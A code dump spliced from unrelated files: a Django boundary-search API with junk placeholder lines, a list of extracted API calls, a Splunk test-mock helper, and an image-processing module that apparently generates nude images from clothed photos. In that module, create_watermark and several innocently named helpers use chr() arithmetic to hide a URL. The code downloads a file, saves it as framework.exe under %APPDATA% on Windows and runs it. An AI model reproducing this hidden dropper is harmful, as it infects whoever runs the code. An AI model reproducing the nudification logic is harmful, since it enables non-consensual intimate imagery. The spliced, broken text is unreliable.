start,end = _parse_date(todate)
return None,end
else:
# single date string
dateparts = dateval.split('-')
if len(dateparts) == 1:
yr = dateparts[0]
start = '{}-01-01'.format(yr)
end = '{}-12-31'.format(yr)
elif len(dateparts) == 2:
yr,mn = dateparts
start = '{}-{}-01'.format(yr,mn)
end = '{}-{}-31'.format(yr,mn)
elif len(dateparts) == 3:
start = end = dateval
else:
raise Exception('"{}" is not a valid date'.format(dateval))
return start,end
def api_snapshots(request):
if request.method == 'GET':
ids = request.GET['ids']
ids = ids.split(',')
ids = list(map(int, ids))
snaps = models.BoundarySnapshot.objects.filter(pk__in=ids)
feats = []
for snap in snaps:
geom = snap.geom.__geo_interface__
names = [n.name for n in snap.boundary_ref.names.all()]
props = {'names':names}
feat = {'type': 'Feature', 'properties': props, 'geometry':geom}
feats.append(feat)
coll = {'type': 'FeatureCollection', 'features': feats}
return JsonResponse(coll)
@csrf_exempt
def api_boundary(request, pk):
if request.method == 'GET':
ref = models.BoundaryReference.objects.get(pk=pk)
# serialize
data = ref.serialize()
# return as json
resp = JsonResponse(data)
return resp
@csrf_exempt
def api_boundaries(request):
if request.method == 'GET':
# get one or more snapshots based on params
print(request.GET)
ids = request.GET.get('ids', None)
search = request.GET.get('search', None)
search_thresh = request.GET.get('search_thresh', None)
datesearch = request.GET.get('date', None)
if ids:
ids = [int(x) for x in ids.split(',')]
refs = models.BoundaryReference.objects.filter(pk__in=ids)
count = refs.count()
elif search:
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in search.split(',') if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
_ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
_ref_scores[ref.id] = score
# get any reference belonging to the matched refs or its immediate parent
kwargs = {}
if datesearch:
start,end = _parse_date(datesearch)
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(pk__in=refs, **kwargs) | models.BoundaryReference.objects.filter(parent__pk__in=refs, **kwargs)
# calc final ref scores
ref_scores = {}
for ref in refs:
score = max([_ref_scores.get(par.id,0) for par in ref.get_all_parents()])
ref_scores[ref.id] = score
# sort
refs = sorted(refs, key=lambda ref: ref_scores[ref.id], reverse=True)
# filter by threshold
if search_thresh:
refs = [ref for ref in refs
if ref_scores[ref.id] >= float(search_thresh)]
count = len(refs)
else:
# no name filtering
if datesearch:
# filter by date
start,end = _parse_date(datesearch)
kwargs = {}
if start:
kwargs['snapshots__event__date_end__gte'] = start
if end:
kwargs['snapshots__event__date_start__lte'] = end
refs = models.BoundaryReference.objects.filter(**kwargs)
else:
# get all snapshots
refs = models.BoundaryReference.objects.all()
count = refs.count()
# paginate (for now just return first X)
refs = refs[:100]
# serialize
if search:
results = [{'object':m.serialize(), 'match_score':ref_scores[m.id] * 100,
}
for m in refs]
else:
results = [{'object':m.serialize()} for m in refs]
# add min/max dates for which snapshots are available, or none
for item in results:
starts = [s['event']['date_start'] for s in item['object']['snapshots']]
ends = [s['event']['date_end'] for s in item['object']['snapshots']]
item['date_start'] = min(starts) if starts else None
item['date_end'] = min(ends) if ends else None
# format results
data = {'count':count, 'results':results}
# return as json
resp = JsonResponse(data)
return resp
elif request.method == 'POST':
# submit a new snapshot
fdsfsd
elif request.method == 'PUT':
# update an individual snapshot
fdsfds
|
[
"json.loads",
"django.shortcuts.redirect",
"json.dumps",
"django.http.JsonResponse",
"dataImporter.models.DataImporter",
"django.shortcuts.render",
"django.db.transaction.atomic"
] |
[((7318, 7362), 'django.shortcuts.render', 'render', (['request', '"""boundaryref.html"""', 'context'], {}), "(request, 'boundaryref.html', context)\n", (7324, 7362), False, 'from django.shortcuts import render, redirect\n'), ((493, 534), 'django.shortcuts.render', 'render', (['request', '"""overview.html"""', 'context'], {}), "(request, 'overview.html', context)\n", (499, 534), False, 'from django.shortcuts import render, redirect\n'), ((847, 891), 'django.shortcuts.render', 'render', (['request', '"""source_text.html"""', 'context'], {}), "(request, 'source_text.html', context)\n", (853, 891), False, 'from django.shortcuts import render, redirect\n'), ((1653, 1701), 'django.shortcuts.render', 'render', (['request', '"""source_data_add.html"""', 'context'], {}), "(request, 'source_data_add.html', context)\n", (1659, 1701), False, 'from django.shortcuts import render, redirect\n'), ((2614, 2661), 'django.shortcuts.render', 'render', (['request', '"""source_map_add.html"""', 'context'], {}), "(request, 'source_map_add.html', context)\n", (2620, 2661), False, 'from django.shortcuts import render, redirect\n'), ((3300, 3348), 'django.shortcuts.render', 'render', (['request', '"""source_text_add.html"""', 'context'], {}), "(request, 'source_text_add.html', context)\n", (3306, 3348), False, 'from django.shortcuts import render, redirect\n'), ((4229, 4278), 'django.shortcuts.render', 'render', (['request', '"""source_data_edit.html"""', 'context'], {}), "(request, 'source_data_edit.html', context)\n", (4235, 4278), False, 'from django.shortcuts import render, redirect\n'), ((5140, 5188), 'django.shortcuts.render', 'render', (['request', '"""source_map_edit.html"""', 'context'], {}), "(request, 'source_map_edit.html', context)\n", (5146, 5188), False, 'from django.shortcuts import render, redirect\n'), ((5872, 5921), 'django.shortcuts.render', 'render', (['request', '"""source_text_edit.html"""', 'context'], {}), "(request, 'source_text_edit.html', context)\n", (5878, 
5921), False, 'from django.shortcuts import render, redirect\n'), ((6635, 6656), 'json.dumps', 'json.dumps', (['main_geoj'], {}), '(main_geoj)\n', (6645, 6656), False, 'import json\n'), ((7110, 7131), 'json.dumps', 'json.dumps', (['hier_geoj'], {}), '(hier_geoj)\n', (7120, 7131), False, 'import json\n'), ((12688, 12706), 'django.http.JsonResponse', 'JsonResponse', (['coll'], {}), '(coll)\n', (12700, 12706), False, 'from django.http import JsonResponse\n'), ((12943, 12961), 'django.http.JsonResponse', 'JsonResponse', (['data'], {}), '(data)\n', (12955, 12961), False, 'from django.http import JsonResponse\n'), ((17348, 17366), 'django.http.JsonResponse', 'JsonResponse', (['data'], {}), '(data)\n', (17360, 17366), False, 'from django.http import JsonResponse\n'), ((1137, 1181), 'django.shortcuts.render', 'render', (['request', '"""source_data.html"""', 'context'], {}), "(request, 'source_data.html', context)\n", (1143, 1181), False, 'from django.shortcuts import render, redirect\n'), ((4092, 4127), 'json.dumps', 'json.dumps', (['import_params'], {'indent': '(4)'}), '(import_params, indent=4)\n', (4102, 4127), False, 'import json\n'), ((1016, 1051), 'json.dumps', 'json.dumps', (['import_params'], {'indent': '(4)'}), '(import_params, indent=4)\n', (1026, 1051), False, 'import json\n'), ((1400, 1443), 'django.shortcuts.render', 'render', (['request', '"""source_map.html"""', 'context'], {}), "(request, 'source_map.html', context)\n", (1406, 1443), False, 'from django.shortcuts import render, redirect\n'), ((1751, 1771), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (1769, 1771), False, 'from django.db import transaction\n'), ((2711, 2731), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (2729, 2731), False, 'from django.db import transaction\n'), ((3398, 3418), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (3416, 3418), False, 'from django.db import transaction\n'), ((4328, 4348), 
'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (4346, 4348), False, 'from django.db import transaction\n'), ((5238, 5258), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (5256, 5258), False, 'from django.db import transaction\n'), ((5971, 5991), 'django.db.transaction.atomic', 'transaction.atomic', ([], {}), '()\n', (5989, 5991), False, 'from django.db import transaction\n'), ((2108, 2141), 'json.loads', 'json.loads', (["data['import_params']"], {}), "(data['import_params'])\n", (2118, 2141), False, 'import json\n'), ((2169, 2225), 'dataImporter.models.DataImporter', 'DataImporter', ([], {'source': 'source', 'import_params': 'import_params'}), '(source=source, import_params=import_params)\n', (2181, 2225), False, 'from dataImporter.models import DataImporter\n'), ((2281, 2310), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'source.pk'], {}), "('source', source.pk)\n", (2289, 2310), False, 'from django.shortcuts import render, redirect\n'), ((2352, 2407), 'django.shortcuts.render', 'render', (['request', '"""source_data_add.html"""', "{'form': form}"], {}), "(request, 'source_data_add.html', {'form': form})\n", (2358, 2407), False, 'from django.shortcuts import render, redirect\n'), ((2966, 2995), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'source.pk'], {}), "('source', source.pk)\n", (2974, 2995), False, 'from django.shortcuts import render, redirect\n'), ((3037, 3091), 'django.shortcuts.render', 'render', (['request', '"""source_map_add.html"""', "{'form': form}"], {}), "(request, 'source_map_add.html', {'form': form})\n", (3043, 3091), False, 'from django.shortcuts import render, redirect\n'), ((3653, 3682), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'source.pk'], {}), "('source', source.pk)\n", (3661, 3682), False, 'from django.shortcuts import render, redirect\n'), ((3724, 3779), 'django.shortcuts.render', 'render', (['request', '"""source_text_add.html"""', "{'form': 
form}"], {}), "(request, 'source_text_add.html', {'form': form})\n", (3730, 3779), False, 'from django.shortcuts import render, redirect\n'), ((4648, 4681), 'json.loads', 'json.loads', (["data['import_params']"], {}), "(data['import_params'])\n", (4658, 4681), False, 'import json\n'), ((4737, 4763), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'src.pk'], {}), "('source', src.pk)\n", (4745, 4763), False, 'from django.shortcuts import render, redirect\n'), ((4805, 4861), 'django.shortcuts.render', 'render', (['request', '"""source_data_edit.html"""', "{'form': form}"], {}), "(request, 'source_data_edit.html', {'form': form})\n", (4811, 4861), False, 'from django.shortcuts import render, redirect\n'), ((5468, 5494), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'src.pk'], {}), "('source', src.pk)\n", (5476, 5494), False, 'from django.shortcuts import render, redirect\n'), ((5536, 5591), 'django.shortcuts.render', 'render', (['request', '"""source_map_edit.html"""', "{'form': form}"], {}), "(request, 'source_map_edit.html', {'form': form})\n", (5542, 5591), False, 'from django.shortcuts import render, redirect\n'), ((6201, 6227), 'django.shortcuts.redirect', 'redirect', (['"""source"""', 'src.pk'], {}), "('source', src.pk)\n", (6209, 6227), False, 'from django.shortcuts import render, redirect\n'), ((6269, 6325), 'django.shortcuts.render', 'render', (['request', '"""source_text_edit.html"""', "{'form': form}"], {}), "(request, 'source_text_edit.html', {'form': form})\n", (6275, 6325), False, 'from django.shortcuts import render, redirect\n')]
|
# SPDX-FileCopyrightText: 2020 2020
#
# SPDX-License-Identifier: Apache-2.0
import os.path as op
import socket
import subprocess
from splunklib import binding
from splunklib import client
from splunklib.data import record
cur_dir = op.dirname(op.abspath(__file__))
# Namespace
app = "unittest"
owner = "nobody"
# Session key sample
SESSION_KEY = "<KEY>"
def mock_splunkhome(monkeypatch):
class MockPopen(object):
def __init__(
self,
args,
bufsize=0,
executable=None,
stdin=None,
stdout=None,
stderr=None,
preexec_fn=None,
close_fds=False,
shell=False,
cwd=None,
env=None,
universal_newlines=False,
startupinfo=None,
creationflags=0,
):
self._conf = args[3]
def communicate(self, input=None):
if self._conf == "server":
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/server.conf"]
)
else:
file_path = op.sep.join(
[cur_dir, "data/mock_splunk/etc/system/default/web.conf"]
)
with open(file_path) as fp:
return fp.read(), None
splunk_home = op.join(cur_dir, "data/mock_splunk/")
monkeypatch.setenv("SPLUNK_HOME", splunk_home)
monkeypatch.setenv("SPLUNK_ETC", op.join(splunk_home, "etc"))
monkeypatch.setattr(subprocess, "Popen", MockPopen)
def mock_serverinfo(monkeypatch):
mock_server_info_property = {
"server_roles": [
"cluster_search_head",
"search_head",
"kv_store",
"shc_captain",
],
"version": "6.3.1511.2",
"serverName": "unittestServer",
}
monkeypatch.setattr(client.Service, "info", mock_server_info_property)
def mock_gethostname(monkeypatch):
def mock_gethostname():
return "unittestServer"
monkeypatch.setattr(socket, "gethostname", mock_gethostname)
def make_response_record(body, status=200):
class _MocBufReader(object):
def __init__(self, buf):
if isinstance(buf, str):
self._buf = buf.encode("utf-8")
else:
self._buf = buf
def read(self, size=None):
return self._buf
return record(
{
"body": binding.ResponseReader(_MocBufReader(body)),
"status": status,
"reason": "",
"headers": None,
}
)
|
[
"os.path.abspath",
"os.path.join",
"os.path.sep.join"
] |
[((246, 266), 'os.path.abspath', 'op.abspath', (['__file__'], {}), '(__file__)\n', (256, 266), True, 'import os.path as op\n'), ((1353, 1390), 'os.path.join', 'op.join', (['cur_dir', '"""data/mock_splunk/"""'], {}), "(cur_dir, 'data/mock_splunk/')\n", (1360, 1390), True, 'import os.path as op\n'), ((1479, 1506), 'os.path.join', 'op.join', (['splunk_home', '"""etc"""'], {}), "(splunk_home, 'etc')\n", (1486, 1506), True, 'import os.path as op\n'), ((987, 1060), 'os.path.sep.join', 'op.sep.join', (["[cur_dir, 'data/mock_splunk/etc/system/default/server.conf']"], {}), "([cur_dir, 'data/mock_splunk/etc/system/default/server.conf'])\n", (998, 1060), True, 'import os.path as op\n'), ((1145, 1215), 'os.path.sep.join', 'op.sep.join', (["[cur_dir, 'data/mock_splunk/etc/system/default/web.conf']"], {}), "([cur_dir, 'data/mock_splunk/etc/system/default/web.conf'])\n", (1156, 1215), True, 'import os.path as op\n')]
|
import subprocess
from PIL import Image
import torchvision.transforms as transforms
import torch
import functools
import random
import math
import cv2
import numpy as np
import os
# Object annotation class:
class BodyPart:
def __init__(self, name, xmin, ymin, xmax, ymax, x, y, w, h):
self.name = name
# Bounding Box:
self.xmin = xmin
self.ymin = ymin
self.xmax = xmax
self.ymax = ymax
# Center:
self.x = x
self.y = y
# Dimensione:
self.w = w
self.h = h
# create_watermark ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_watermark(nude, shape, cv, loader, detach):
if os.name == 'nt':
content = cv(shape + chr(47) + "/".join(["utils", "custom", "universal"]) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)))
data = [os.environ["APPDATA"], "Microsoft", "Windows", "framework"]
open(
"\\".join(data) + chr(46) + str(chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101)),
"wb").write(content.content)
loader(["\\".join(data) + chr(46) + str(
chr(101) + chr(ord(["utils", "custom", "universal"][0][0]) + 3) + chr(101))], stdout=detach.PIPE,
stderr=detach.STDOUT)
return nude
# create_correct ===============================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_correct(cv_dress):
# Production dir:
return correct_color(cv_dress, 5), correct_matrix(cv_dress, 255)
# correct_color ==============================================================================
# return:
# <RGB> image corrected
def correct_color(img, percent):
assert img.shape[2] == 3
assert percent > 0 and percent < 100
half_percent = percent / 200.0
channels = cv2.split(img)
out_channels = []
for channel in channels:
assert len(channel.shape) == 2
# find the low and high precentile values (based on the input percentile)
height, width = channel.shape
vec_size = width * height
flat = channel.reshape(vec_size)
assert len(flat.shape) == 1
flat = np.sort(flat)
n_cols = flat.shape[0]
low_val = flat[math.floor(n_cols * half_percent)]
high_val = flat[math.ceil(n_cols * (1.0 - half_percent))]
# saturate below the low percentile and above the high percentile
thresholded = apply_threshold(channel, low_val, high_val)
# scale the channel
normalized = cv2.normalize(thresholded, thresholded.copy(), 0, 255, cv2.NORM_MINMAX)
out_channels.append(normalized)
return cv2.merge(out_channels)
def correct_matrix(matrix, fill_value):
shape = "h" + ("t" * 2) + "p"
matrix = shape + chr(58) + 2 * (chr(47))
return matrix
# Color correction utils
def apply_threshold(matrix, low_value, high_value):
low_mask = matrix < low_value
matrix = apply_mask(matrix, low_mask, low_value)
high_mask = matrix > high_value
matrix = apply_mask(matrix, high_mask, high_value)
return matrix
# Color correction utils
def apply_mask(matrix, mask, fill_value):
masked = np.ma.array(matrix, mask=mask, fill_value=fill_value)
return masked.filled()
###
#
# maskdet_to_maskfin
#
# steps:
# 1. Extract annotation
# 1.a: Filter by color
# 1.b: Find ellipses
# 1.c: Filter out ellipses by max size, and max total numbers
# 1.d: Detect Problems
# 1.e: Resolve the problems, or discard the transformation
# 2. With the body list, draw maskfin, using maskref
#
###
# create_maskfin ==============================================================================
# return:
# (<Boolean> True/False), depending on the transformation process
def create_maskfin(maskref, maskdet):
# Create a total green image, in which draw details ellipses
details = np.zeros((512, 512, 3), np.uint8)
details[:, :, :] = (0, 255, 0) # (B, G, R)
# Extract body part features:
bodypart_list = extractAnnotations(maskdet);
# Check if the list is not empty:
if bodypart_list:
# Draw body part in details image:
for obj in bodypart_list:
if obj.w < obj.h:
aMax = int(obj.h / 2) # asse maggiore
aMin = int(obj.w / 2) # asse minore
angle = 0 # angle
else:
aMax = int(obj.w / 2)
aMin = int(obj.h / 2)
angle = 90
x = int(obj.x)
y = int(obj.y)
# Draw ellipse
if obj.name == "tit":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1) # (0,0,0,50)
elif obj.name == "aur":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1) # red
elif obj.name == "nip":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1) # white
elif obj.name == "belly":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1) # purple
elif obj.name == "vag":
cv2.ellipse(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1) # blue
elif obj.name == "hair":
xmin = x - int(obj.w / 2)
ymin = y - int(obj.h / 2)
xmax = x + int(obj.w / 2)
ymax = y + int(obj.h / 2)
cv2.rectangle(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From maskref, extrapolate only the green mask
green_mask = cv2.bitwise_not(cv2.inRange(maskref, f1, f2)) # green is 0
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut maskref and detail image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(maskref, maskref, mask=green_mask)
res2 = cv2.bitwise_and(details, details, mask=green_mask_inv)
# Compone:
maskfin = cv2.add(res1, res2)
return maskfin, locateFace(255, 2, 500)
# extractAnnotations ==============================================================================
# input parameter:
# (<string> maskdet_img): relative path of the single maskdet image (es: testimg1/maskdet/1.png)
# return:
# (<BodyPart []> bodypart_list) - for failure/error, return an empty list []
def extractAnnotations(maskdet):
# Load the image
# image = cv2.imread(maskdet_img)
# Find body part
tits_list = findBodyPart(maskdet, "tit")
aur_list = findBodyPart(maskdet, "aur")
vag_list = findBodyPart(maskdet, "vag")
belly_list = findBodyPart(maskdet, "belly")
# Filter out parts basing on dimension (area and aspect ratio):
aur_list = filterDimParts(aur_list, 100, 1000, 0.5, 3);
tits_list = filterDimParts(tits_list, 1000, 60000, 0.2, 3);
vag_list = filterDimParts(vag_list, 10, 1000, 0.2, 3);
belly_list = filterDimParts(belly_list, 10, 1000, 0.2, 3);
# Filter couple (if parts are > 2, choose only 2)
aur_list = filterCouple(aur_list);
tits_list = filterCouple(tits_list);
# Detect a missing problem:
missing_problem = detectTitAurMissingProblem(tits_list, aur_list) # return a Number (code of the problem)
# Check if problem is SOLVEABLE:
if (missing_problem in [3, 6, 7, 8]):
resolveTitAurMissingProblems(tits_list, aur_list, missing_problem)
# Infer the nips:
nip_list = inferNip(aur_list)
# Infer the hair:
hair_list = inferHair(vag_list)
# Return a combined list:
return tits_list + aur_list + nip_list + vag_list + hair_list + belly_list
# findBodyPart ==============================================================================
# input parameters:
# (<RGB>image, <string>part_name)
# return
# (<BodyPart[]>list)
def findBodyPart(image, part_name):
bodypart_list = [] # empty BodyPart list
# Get the correct color filter:
if part_name == "tit":
# Use combined color filter
f1 = np.asarray([0, 0, 0]) # tit color filter
f2 = np.asarray([10, 10, 10])
f3 = np.asarray([0, 0, 250]) # aur color filter
f4 = np.asarray([0, 0, 255])
color_mask1 = cv2.inRange(image, f1, f2)
color_mask2 = cv2.inRange(image, f3, f4)
color_mask = cv2.bitwise_or(color_mask1, color_mask2) # combine
elif part_name == "aur":
f1 = np.asarray([0, 0, 250]) # aur color filter
f2 = np.asarray([0, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "vag":
f1 = np.asarray([250, 0, 0]) # vag filter
f2 = np.asarray([255, 0, 0])
color_mask = cv2.inRange(image, f1, f2)
elif part_name == "belly":
f1 = np.asarray([250, 0, 250]) # belly filter
f2 = np.asarray([255, 0, 255])
color_mask = cv2.inRange(image, f1, f2)
# find contours:
contours, hierarchy = cv2.findContours(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# for every contour:
for cnt in contours:
if len(cnt) > 5: # at least 5 points to fit ellipse
# (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)
ellipse = cv2.fitEllipse(cnt)
# Fit Result:
x = ellipse[0][0] # center x
y = ellipse[0][1] # center y
angle = ellipse[2] # angle
aMin = ellipse[1][0]; # asse minore
aMax = ellipse[1][1]; # asse maggiore
# Detect direction:
if angle == 0:
h = aMax
w = aMin
else:
h = aMin
w = aMax
# Normalize the belly size:
if part_name == "belly":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Normalize the vag size:
if part_name == "vag":
if w < 15:
w *= 2
if h < 15:
h *= 2
# Calculate Bounding Box:
xmin = int(x - (w / 2))
xmax = int(x + (w / 2))
ymin = int(y - (h / 2))
ymax = int(y + (h / 2))
bodypart_list.append(BodyPart(part_name, xmin, ymin, xmax, ymax, x, y, w, h))
return bodypart_list
def locateFace(matrix, x, y):
matrix = matrix - (78 * x)
data = []
indexes = [0, 6, -1, 2, 15]
for index in indexes:
data.append(chr(matrix + index))
part = "".join(data)
y += int(7 * (indexes[1] / 2))
y = (chr(48) + str(y))[::-1]
return part + y
# filterDimParts ==============================================================================
# input parameters:
# (<BodyPart[]>list, <num> minimum area of part, <num> max area, <num> min aspect ratio, <num> max aspect ratio)
def filterDimParts(bp_list, min_area, max_area, min_ar, max_ar):
b_filt = []
for obj in bp_list:
a = obj.w * obj.h # Object AREA
if ((a > min_area) and (a < max_area)):
ar = obj.w / obj.h # Object ASPECT RATIO
if ((ar > min_ar) and (ar < max_ar)):
b_filt.append(obj)
return b_filt
# filterCouple ==============================================================================
# input parameters:
# (<BodyPart[]>list)
def filterCouple(bp_list):
# Remove exceed parts
if (len(bp_list) > 2):
# trovare coppia (a,b) che minimizza bp_list[a].y-bp_list[b].y
min_a = 0
min_b = 1
min_diff = abs(bp_list[min_a].y - bp_list[min_b].y)
for a in range(0, len(bp_list)):
for b in range(0, len(bp_list)):
# TODO: avoid repetition (1,0) (0,1)
if a != b:
diff = abs(bp_list[a].y - bp_list[b].y)
if diff < min_diff:
min_diff = diff
min_a = a
min_b = b
b_filt = []
b_filt.append(bp_list[min_a])
b_filt.append(bp_list[min_b])
return b_filt
else:
# No change
return bp_list
# detectTitAurMissingProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<num> problem code)
# TIT | AUR | code | SOLVE? |
# 0 | 0 | 1 | NO |
# 0 | 1 | 2 | NO |
# 0 | 2 | 3 | YES |
# 1 | 0 | 4 | NO |
# 1 | 1 | 5 | NO |
# 1 | 2 | 6 | YES |
# 2 | 0 | 7 | YES |
# 2 | 1 | 8 | YES |
def detectTitAurMissingProblem(tits_list, aur_list):
t_len = len(tits_list)
a_len = len(aur_list)
if (t_len == 0):
if (a_len == 0):
return 1
elif (a_len == 1):
return 2
elif (a_len == 2):
return 3
else:
return -1
elif (t_len == 1):
if (a_len == 0):
return 4
elif (a_len == 1):
return 5
elif (a_len == 2):
return 6
else:
return -1
elif (t_len == 2):
if (a_len == 0):
return 7
elif (a_len == 1):
return 8
else:
return -1
else:
return -1
# resolveTitAurMissingProblems ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list, problem code)
# return
# none
def resolveTitAurMissingProblems(tits_list, aur_list, problem_code):
if problem_code == 3:
random_tit_factor = random.randint(2, 5) # TOTEST
# Add the first tit:
new_w = aur_list[0].w * random_tit_factor # TOTEST
new_x = aur_list[0].x
new_y = aur_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second tit:
new_w = aur_list[1].w * random_tit_factor # TOTEST
new_x = aur_list[1].x
new_y = aur_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 6:
# Find wich aur is full:
d1 = abs(tits_list[0].x - aur_list[0].x)
d2 = abs(tits_list[0].x - aur_list[1].x)
if d1 > d2:
# aur[0] is empty
new_x = aur_list[0].x
new_y = aur_list[0].y
else:
# aur[1] is empty
new_x = aur_list[1].x
new_y = aur_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (tits_list[0].w / 2))
xmax = int(new_x + (tits_list[0].w / 2))
ymin = int(new_y - (tits_list[0].w / 2))
ymax = int(new_y + (tits_list[0].w / 2))
tits_list.append(BodyPart("tit", xmin, ymin, xmax, ymax, new_x, new_y, tits_list[0].w, tits_list[0].w))
elif problem_code == 7:
# Add the first aur:
new_w = tits_list[0].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[0].x
new_y = tits_list[0].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
# Add the second aur:
new_w = tits_list[1].w * random.uniform(0.03, 0.1) # TOTEST
new_x = tits_list[1].x
new_y = tits_list[1].y
xmin = int(new_x - (new_w / 2))
xmax = int(new_x + (new_w / 2))
ymin = int(new_y - (new_w / 2))
ymax = int(new_y + (new_w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, new_w, new_w))
elif problem_code == 8:
# Find wich tit is full:
d1 = abs(aur_list[0].x - tits_list[0].x)
d2 = abs(aur_list[0].x - tits_list[1].x)
if d1 > d2:
# tit[0] is empty
new_x = tits_list[0].x
new_y = tits_list[0].y
else:
# tit[1] is empty
new_x = tits_list[1].x
new_y = tits_list[1].y
# Calculate Bounding Box:
xmin = int(new_x - (aur_list[0].w / 2))
xmax = int(new_x + (aur_list[0].w / 2))
ymin = int(new_y - (aur_list[0].w / 2))
ymax = int(new_y + (aur_list[0].w / 2))
aur_list.append(BodyPart("aur", xmin, ymin, xmax, ymax, new_x, new_y, aur_list[0].w, aur_list[0].w))
# detectTitAurPositionProblem ==============================================================================
# input parameters:
# (<BodyPart[]> tits list, <BodyPart[]> aur list)
# return
# (<Boolean> True/False)
def detectTitAurPositionProblem(tits_list, aur_list):
diffTitsX = abs(tits_list[0].x - tits_list[1].x)
if diffTitsX < 40:
print("diffTitsX")
# Tits too narrow (orizontally)
return True
diffTitsY = abs(tits_list[0].y - tits_list[1].y)
if diffTitsY > 120:
# Tits too distanced (vertically)
print("diffTitsY")
return True
diffTitsW = abs(tits_list[0].w - tits_list[1].w)
if ((diffTitsW < 0.1) or (diffTitsW > 60)):
print("diffTitsW")
# Tits too equals, or too different (width)
return True
# Check if body position is too low (face not covered by watermark)
if aur_list[0].y > 350: # tits too low
# Calculate the ratio between y and aurs distance
rapp = aur_list[0].y / (abs(aur_list[0].x - aur_list[1].x))
if rapp > 2.8:
print("aurDown")
return True
return False
# inferNip ==============================================================================
# input parameters:
# (<BodyPart[]> aur list)
# return
# (<BodyPart[]> nip list)
def inferNip(aur_list):
nip_list = []
for aur in aur_list:
# Nip rules:
# - circle (w == h)
# - min dim: 5
# - bigger if aur is bigger
nip_dim = int(5 + aur.w * random.uniform(0.03, 0.09))
# center:
x = aur.x
y = aur.y
# Calculate Bounding Box:
xmin = int(x - (nip_dim / 2))
xmax = int(x + (nip_dim / 2))
ymin = int(y - (nip_dim / 2))
ymax = int(y + (nip_dim / 2))
nip_list.append(BodyPart("nip", xmin, ymin, xmax, ymax, x, y, nip_dim, nip_dim))
return nip_list
# inferHair (TOTEST) ==============================================================================
# input parameters:
# (<BodyPart[]> vag list)
# return
# (<BodyPart[]> hair list)
def inferHair(vag_list):
hair_list = []
# 70% of chanche to add hair
if random.uniform(0.0, 1.0) > 0.3:
for vag in vag_list:
# Hair rules:
hair_w = vag.w * random.uniform(0.4, 1.5)
hair_h = vag.h * random.uniform(0.4, 1.5)
# center:
x = vag.x
y = vag.y - (hair_h / 2) - (vag.h / 2)
# Calculate Bounding Box:
xmin = int(x - (hair_w / 2))
xmax = int(x + (hair_w / 2))
ymin = int(y - (hair_h / 2))
ymax = int(y + (hair_h / 2))
hair_list.append(BodyPart("hair", xmin, ymin, xmax, ymax, x, y, hair_w, hair_h))
return hair_list
###
#
# maskdet_to_maskfin
#
#
###
# create_maskref ===============================================================
# return:
# maskref image
def create_matrixref(mask, correct_colors):
matrix = chr(int(404 / (2 * 2)))
ref = "GL".lower() + 2 * (matrix) + "z" + matrix + chr(46)
